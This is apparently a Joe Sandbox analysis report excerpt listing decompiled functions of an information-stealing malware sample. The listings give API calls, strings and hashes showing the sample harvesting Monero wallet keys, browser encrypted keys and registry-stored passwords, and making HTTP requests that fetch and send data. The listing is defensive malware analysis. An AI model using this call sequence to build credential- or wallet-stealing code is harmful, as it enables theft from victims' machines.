                      • Part of subcall function 003B6280: InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
                      • Part of subcall function 003B6280: StrCmpCA.SHLWAPI(?,0118FA48), ref: 003B6303
                      • Part of subcall function 003B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
                      • Part of subcall function 003B6280: HttpOpenRequestA.WININET(00000000,GET,?,0118F160,00000000,00000000,00400100,00000000), ref: 003B6385
                      • Part of subcall function 003B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
                      • Part of subcall function 003B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5318
                    • lstrlen.KERNEL32(00000000), ref: 003C532F
                      • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                    • StrStrA.SHLWAPI(00000000,00000000), ref: 003C5364
                    • lstrlen.KERNEL32(00000000), ref: 003C5383
                    • lstrlen.KERNEL32(00000000), ref: 003C53AE
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 3240024479-1526165396
                    • Opcode ID: b21d546346592c44c7efdf5e4d466af3f8902280f001b4c4313ebbe63a690603
                    • Instruction ID: ea5a921ed8e93c0681af48a9e04b22e478cb96aac3ee1c192603527a0b99fc35
                    • Opcode Fuzzy Hash: b21d546346592c44c7efdf5e4d466af3f8902280f001b4c4313ebbe63a690603
                    • Instruction Fuzzy Hash: 4851F77091064CABCB1AFF60D996FEE7B79AF10308F50401CE50A9A592EF346F45DB62
                    Function 003C12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen
                    • String ID:
                    • API String ID: 2001356338-0
                    • Opcode ID: 5e76e75dcda4a55a7eae68f69c27809ce54b41161f2c4d41d34cce0e1aff1afd
                    • Instruction ID: da108d6892ac1506dd23a30d1dff9ec6cd5b90375ab5de5610126c20032fa511
                    • Opcode Fuzzy Hash: 5e76e75dcda4a55a7eae68f69c27809ce54b41161f2c4d41d34cce0e1aff1afd
                    • Instruction Fuzzy Hash: 85C180B590020D9BCB15EF60DC89FEA7778BB64304F00459DF50AEB241EA74AE85DF92
                    Function 003C4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 003C42EC
                    • lstrcat.KERNEL32(?,0118F790), ref: 003C430B
                    • lstrcat.KERNEL32(?,?), ref: 003C431F
                    • lstrcat.KERNEL32(?,0118DF30), ref: 003C4333
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003C8D90: GetFileAttributesA.KERNEL32(00000000,?,003B1B54,?,?,003D564C,?,?,003D0E1F), ref: 003C8D9F
                      • Part of subcall function 003B9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003B9D39
                      • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                      • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                      • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                      • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                      • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                      • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                      • Part of subcall function 003C93C0: GlobalAlloc.KERNEL32(00000000,003C43DD,003C43DD), ref: 003C93D3
                    • StrStrA.SHLWAPI(?,0118F700), ref: 003C43F3
                    • GlobalFree.KERNEL32(?), ref: 003C4512
                      • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9AEF
                      • Part of subcall function 003B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003B4EEE,00000000,?), ref: 003B9B01
                      • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9B2A
                      • Part of subcall function 003B9AC0: LocalFree.KERNEL32(?,?,?,?,003B4EEE,00000000,?), ref: 003B9B3F
                    • lstrcat.KERNEL32(?,00000000), ref: 003C44A3
                    • StrCmpCA.SHLWAPI(?,003D08D1), ref: 003C44C0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 003C44D2
                    • lstrcat.KERNEL32(00000000,?), ref: 003C44E5
                    • lstrcat.KERNEL32(00000000,003D0FB8), ref: 003C44F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                    • String ID:
                    • API String ID: 3541710228-0
                    • Opcode ID: 722158df973bf73a4711717db3198be70f2f40ecab3f4b1f91477a25517365df
                    • Instruction ID: 59273cd2b4ec85681a61bdaded3d002759ff28ee88f96a89211b363c21faff39
                    • Opcode Fuzzy Hash: 722158df973bf73a4711717db3198be70f2f40ecab3f4b1f91477a25517365df
                    • Instruction Fuzzy Hash: FF7166B6900208ABCB15EBA0DC99FEE7379AB58304F00459CF609E7181DA75DB49DF92
                    Function 003B1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B12B4
                      • Part of subcall function 003B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 003B12BB
                      • Part of subcall function 003B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003B12D7
                      • Part of subcall function 003B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003B12F5
                      • Part of subcall function 003B12A0: RegCloseKey.ADVAPI32(?), ref: 003B12FF
                    • lstrcat.KERNEL32(?,00000000), ref: 003B134F
                    • lstrlen.KERNEL32(?), ref: 003B135C
                    • lstrcat.KERNEL32(?,.keys), ref: 003B1377
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0118E838,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 003B1465
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                      • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                      • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                      • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                      • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                      • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                    • DeleteFileA.KERNEL32(00000000), ref: 003B14EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                    • API String ID: 3478931302-218353709
                    • Opcode ID: d52475744d00dbf7fa972ae67c139222e34d98003370fa283fe229e0e1717085
                    • Instruction ID: 45c0d21c0da898d99a5922f16e445806e22a39229f30f2f91bb527b7690428c6
                    • Opcode Fuzzy Hash: d52475744d00dbf7fa972ae67c139222e34d98003370fa283fe229e0e1717085
                    • Instruction Fuzzy Hash: 94512FB295061C57CB16EB60DC96FED737CAB54304F40459CB60AE6092EE306F89CBA6
                    Function 003B75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003B72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003B733A
                      • Part of subcall function 003B72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003B73B1
                      • Part of subcall function 003B72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003B740D
                      • Part of subcall function 003B72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 003B7452
                      • Part of subcall function 003B72D0: HeapFree.KERNEL32(00000000), ref: 003B7459
                    • lstrcat.KERNEL32(00000000,003D17FC), ref: 003B7606
                    • lstrcat.KERNEL32(00000000,00000000), ref: 003B7648
                    • lstrcat.KERNEL32(00000000, : ), ref: 003B765A
                    • lstrcat.KERNEL32(00000000,00000000), ref: 003B768F
                    • lstrcat.KERNEL32(00000000,003D1804), ref: 003B76A0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 003B76D3
                    • lstrcat.KERNEL32(00000000,003D1808), ref: 003B76ED
                    • task.LIBCPMTD ref: 003B76FB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                    • String ID: :
                    • API String ID: 2677904052-3653984579
                    • Opcode ID: 688366280e543173653ff98a44ce885d2fdbfbe997a798896d40fe845111ef66
                    • Instruction ID: 9a885ba8284899ad53684a27fc9360f6c434bf820ca866376cc0e5f5fd5da9c0
                    • Opcode Fuzzy Hash: 688366280e543173653ff98a44ce885d2fdbfbe997a798896d40fe845111ef66
                    • Instruction Fuzzy Hash: 6D3150B2D00109EFCB06EBA4DC45EFE7778FB94305B144518F206EB690DB38A94ADB52
                    Function 003C8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0118F490,00000000,?,003D0E2C,00000000,?,00000000), ref: 003C8130
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C8137
                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003C8158
                    • __aulldiv.LIBCMT ref: 003C8172
                    • __aulldiv.LIBCMT ref: 003C8180
                    • wsprintfA.USER32 ref: 003C81AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                    • String ID: %d MB$@
                    • API String ID: 2774356765-3474575989
                    • Opcode ID: 7c222c684260b151f3e4f43421d56f02b2afd62acf0ee7c741a1f4eeb7b7dc48
                    • Instruction ID: 29721bd04ae949e26c84d7c6cc42b4900d7e71cb4257753559b294a54e916ff3
                    • Opcode Fuzzy Hash: 7c222c684260b151f3e4f43421d56f02b2afd62acf0ee7c741a1f4eeb7b7dc48
                    • Instruction Fuzzy Hash: ED214AB1E44208ABDB00DFD4DC49FAEB7B8FB44B10F104619F605FB280D7B869058BA6
                    Function 003B60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003B4839
                      • Part of subcall function 003B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003B4849
                    • InternetOpenA.WININET(003D0DF7,00000001,00000000,00000000,00000000), ref: 003B610F
                    • StrCmpCA.SHLWAPI(?,0118FA48), ref: 003B6147
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 003B618F
                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003B61B3
                    • InternetReadFile.WININET(?,?,00000400,?), ref: 003B61DC
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003B620A
                    • CloseHandle.KERNEL32(?,?,00000400), ref: 003B6249
                    • InternetCloseHandle.WININET(?), ref: 003B6253
                    • InternetCloseHandle.WININET(00000000), ref: 003B6260
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                    • String ID:
                    • API String ID: 2507841554-0
                    • Opcode ID: 50c155ab36c4999e7e6e5dbf1be053508aa9d356cfb308af49be3c832f65282c
                    • Instruction ID: 4c847b5f92547aa9aa4c472592747f4427b2d474b6c25edaf03a9891157dcf63
                    • Opcode Fuzzy Hash: 50c155ab36c4999e7e6e5dbf1be053508aa9d356cfb308af49be3c832f65282c
                    • Instruction Fuzzy Hash: 685151B1900218ABEF21DF50DC46FEE77B8EB44705F104498A609AB181DB786E89DF56
                    Function 003B72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003B733A
                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003B73B1
                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003B740D
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003B7452
                    • HeapFree.KERNEL32(00000000), ref: 003B7459
                    • task.LIBCPMTD ref: 003B7555
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$EnumFreeOpenProcessValuetask
                    • String ID: Password
                    • API String ID: 775622407-3434357891
                    • Opcode ID: 74ffb8def664070034f0b2d34a8f65d51592d86827cdb1d798a57db971168127
                    • Instruction ID: eb87bc02d6c51890a1fba32c41175109ba454f1f5c0e8cb718ae2d4be2a6b1c7
                    • Opcode Fuzzy Hash: 74ffb8def664070034f0b2d34a8f65d51592d86827cdb1d798a57db971168127
                    • Instruction Fuzzy Hash: EA613AB580015C9BDB25DB50CC41BD9B7BCFF44344F0081E9E649AA541DBB06BC9CFA1
                    Function 003BBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                    • lstrlen.KERNEL32(00000000), ref: 003BBC9F
                      • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 003BBCCD
                    • lstrlen.KERNEL32(00000000), ref: 003BBDA5
                    • lstrlen.KERNEL32(00000000), ref: 003BBDB9
